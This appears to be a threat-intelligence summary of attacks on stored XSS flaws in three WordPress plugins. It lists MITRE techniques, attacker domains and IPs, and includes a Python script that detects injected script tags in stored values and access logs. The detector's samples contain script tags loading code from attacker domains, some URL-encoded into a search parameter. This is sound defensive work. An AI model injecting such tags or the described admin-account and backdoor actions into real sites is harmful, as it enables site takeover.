Active exploitation of unauthenticated stored XSS vulnerabilities in WordPress Plugins

Active exploitation attempts target three high-severity stored XSS vulnerabilities in WordPress plugins (CVE-2024-2194 in WP Statistics, CVE-2023-6961 in WP Meta SEO, CVE-2023-40000 in LiteSpeed Cache), all exploitable without authentication. The injected script tag loads an external obfuscated JavaScript file that creates administrator accounts, injects PHP backdoors into plugin and theme files, and tracks infected hosts; the attack traffic is concentrated in the Netherlands, and several domains host the payload and the tracking infrastructure. #CVE-2024-2194 #CVE-2023-6961 #CVE-2023-40000 #WPStatistics #WPMetaSEO #LiteSpeedCache #media.cdnstaticjs.com #cloud.cdndynamic.com #assets.scontentflow.com

Keypoints

  • Three WordPress plugin vulnerabilities (CVE-2024-2194, CVE-2023-6961, CVE-2023-40000) are being actively exploited via unauthenticated stored XSS.
  • Attackers inject a script tag that points to an external, obfuscated JavaScript file used across all three CVEs.
  • The malicious JavaScript payloads perform three main actions: inject backdoors, create a new administrator account, and set up tracking scripts.
  • Exploitation activity originates from IPs associated with IP Volume Inc and shows a Netherlands concentration; several domains are used in payloads and tracking.
  • Indicated domains and tracking infrastructure include media.cdnstaticjs.com, idc.cloudiync.com, cloud.cdndynamic.com, cdn.mediajsdelivery.com, assets.scontentflow.com, and cache.cloudswiftcdn.com.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attack targets unauthenticated stored XSS vulnerabilities in WordPress plugins to inject scripts via the URL search parameter. [“The vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the URL search parameter.”]
  • [T1136] Create Account – The payload creates a new administrator account. [“Creating a New Administrator Account: Sends a request to the server’s WordPress installation to create a new administrator account”]
  • [T1505.003] Web Shell – Malicious PHP backdoors injected into plugin and theme files for persistence. [“Injects Malicious PHP Backdoors: Into plugin files; Into theme files.”]
  • [T1059.007] JavaScript – The attack uses JavaScript to deliver payloads, load external scripts, and execute actions in the victim’s browser. [“The contents of the malicious JavaScript perform the following actions:”]
  • [T1027] Obfuscated/Compressed Files and Information – The JavaScript payload is obfuscated to conceal its actions. [“obfuscated JavaScript file hosted on an external domain.”]
  • [T1041] Exfiltration Over C2 Channel – The payload records the HTTP host of each infected site and reports it to the attacker's tracking domains. [“Tracks infected hosts by capturing their HTTP host information.”]

Indicators of Compromise

  • [Domains] – Domains used to host the payload and tracking scripts: media.cdnstaticjs.com, cloud.cdndynamic.com, idc.cloudiync.com, cdn.mediajsdelivery.com, go.kcloudinc.com, assets.scontentflow.com, cache.cloudswiftcdn.com
  • [IP Addresses] – Source IPs of observed exploitation attempts (not a complete list): 80.82.76.214, 31.43.191.220, 94.102.51.144, and several others
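As an added example (not code from the Fastly post or from the affected plugins), the following Python block matches the page's IoCs against stored WordPress values and web server access logs, peeling off layered percent-encoding and HTML entities so a double-encoded script tag still surfaces. The stored value and log lines are constructed for illustration; the `x.js` file name and the `s` query parameter are placeholders, not the real payload path or the vulnerable parameter.

```python
# Added example, not from the Fastly post: match the page's IoCs and detect the
# injected <script src=...> pattern in stored WordPress values and access logs.
# The sample record and log lines below are constructed for illustration.
import html
import re
import urllib.parse

# Indicators listed on the page; a starting point, not a complete set.
IOC_DOMAINS = {
    "media.cdnstaticjs.com", "cloud.cdndynamic.com", "idc.cloudiync.com",
    "cdn.mediajsdelivery.com", "go.kcloudinc.com", "assets.scontentflow.com",
    "cache.cloudswiftcdn.com",
}
IOC_IPS = {"80.82.76.214", "31.43.191.220", "94.102.51.144"}

# <script ... src=URL>, tolerating extra whitespace and missing quotes.
SCRIPT_SRC_RE = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*['\"]?\s*([^'\">\s]+)", re.IGNORECASE
)
# Apache/nginx combined log: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(value: str, rounds: int = 3) -> str:
    """Peel off layered percent-encoding and HTML entities, stopping once the
    text stops changing, so a double-encoded payload still matches."""
    for _ in range(rounds):
        decoded = html.unescape(urllib.parse.unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def host_of(url: str) -> str:
    """Lower-cased host of a script src; '//host/x.js' is protocol-relative."""
    if url.startswith("//"):
        url = "https:" + url
    return (urllib.parse.urlsplit(url).hostname or "").lower()


def inspect_stored_value(value: str, own_hosts=()) -> dict:
    """Decode a stored field (post content, option, statistics record, query
    string) and report every <script src> host, split into known IoC hosts and
    other external hosts. Relative and same-origin sources are not flagged."""
    hosts = [host_of(src) for src in SCRIPT_SRC_RE.findall(normalize(value))]
    own = {h.lower() for h in own_hosts}
    return {
        "hosts": hosts,
        "ioc": [h for h in hosts if h in IOC_DOMAINS],
        "external": [h for h in hosts if h and h not in IOC_DOMAINS and h not in own],
    }


def scan_access_log(lines, own_hosts=()) -> list:
    """Flag requests from listed IPs and requests whose query string carries a
    script tag; returns (ip, path, reasons) per hit, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = []
        if m["ip"] in IOC_IPS:
            reasons.append("source ip in IoC list")
        hit = inspect_stored_value(urllib.parse.urlsplit(m["path"]).query, own_hosts)
        if hit["ioc"]:
            reasons.append("script src to IoC domain: " + ",".join(hit["ioc"]))
        elif hit["hosts"]:
            reasons.append("script tag in query string")
        if reasons:
            findings.append((m["ip"], m["path"], reasons))
    return findings


# Constructed samples. 'x.js' is a placeholder, not the real payload path.
PAYLOAD = '<script src="https://cloud.cdndynamic.com/x.js"></script>'
ENC1 = urllib.parse.quote(PAYLOAD, safe="")   # single percent-encoding
ENC2 = urllib.parse.quote(ENC1, safe="")      # double percent-encoding
SAMPLE_STORED = 'Referrer: <script src="https://media.cdnstaticjs.com/x.js"></script>'
SAMPLE_LOG = [
    f'80.82.76.214 - - [01/Jan/2024:00:00:00 +0000] "GET /?s={ENC1} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [01/Jan/2024:00:00:05 +0000] "GET /?s={ENC2} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'198.51.100.9 - - [01/Jan/2024:00:00:09 +0000] "GET /?s=wordpress+plugins HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(inspect_stored_value(SAMPLE_STORED))
    for ip, path, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, path[:60], reasons)
```

Run `inspect_stored_value` over dumps of `wp_posts`, `wp_options` and the affected plugins' own tables rather than only over the access log: the stored copy is what keeps executing in administrators' browsers after the original request is long gone, and a hit on an unlisted external host is worth a look too, since the IoC list is what was observed, not everything the attackers own.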

Read more: https://www.fastly.com/blog/active-exploitation-unauthenticated-stored-xss-vulnerabilities-wordpress